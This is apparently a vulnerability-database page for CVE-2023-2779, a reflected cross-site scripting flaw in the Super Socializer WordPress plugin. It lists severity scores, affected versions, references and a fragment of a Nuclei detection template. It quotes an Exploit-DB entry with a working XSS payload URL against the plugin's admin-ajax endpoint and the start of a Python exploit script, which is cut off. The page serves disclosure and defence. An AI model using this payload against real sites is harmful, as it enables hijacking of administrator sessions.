CVE-2023-2779
published 2023-06-19CVE-2023-2779: The Social Share, Social Login and Social Comments WordPress plugin before 7.13.52 does not sanitise and escape a parameter before outputting it back in the…
PriorityP338medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
5.99%
92.4th percentile
The Social Share, Social Login and Social Comments WordPress plugin before 7.13.52 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| heator | social_share_social_login_and_social_comments | < 7.13.52 | 7.13.52 |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Super Socializer 7.13.52 - Reflected XSS
exploitdb·2023-06-20·CVSS 6.1
CVE-2023-2779 [MEDIUM] Super Socializer 7.13.52 - Reflected XSS
Super Socializer 7.13.52 - Reflected XSS
---
# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/super-socializer
# Version: 7.13.52 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-2779
import requests
# The URL of the vulnerable AJAX endpoint
url = "https://example.com/wp-admin/admin-ajax.php"
# The vulnerable parameter that is not properly sanitized and escaped
vulnerable_param = ""
# The payload that exploits the vulnerability
payload = {"action": "the_champ_shar
Nuclei
Super Socializer < 7.13.52 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2023-2779 [MEDIUM] Super Socializer < 7.13.52 - Cross-Site Scripting
Super Socializer ") && contains(body_2, "facebook_urls")'
condition: and
# digest: 4a0a0047304502202f3ab2ca4d7c92582bc1826875f03446a62aaab1789dfba06f11bb811e0a78d5022100d8e15cac1352ff21eb26673d594738d27f3334d12df784771f3a37935ffaa749:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
http://packetstormsecurity.com/files/173053/WordPress-Super-Socializer-7.13.52-Cross-Site-Scripting.htmlhttps://wpscan.com/vulnerability/fe9b7696-3b0e-42e2-9dbc-55167605f5c5http://packetstormsecurity.com/files/173053/WordPress-Super-Socializer-7.13.52-Cross-Site-Scripting.htmlhttps://wpscan.com/vulnerability/fe9b7696-3b0e-42e2-9dbc-55167605f5c5https://wpscan.com/vulnerability/fe9b7696-3b0e-42e2-9dbc-55167605f5c5/
2023-06-19
Published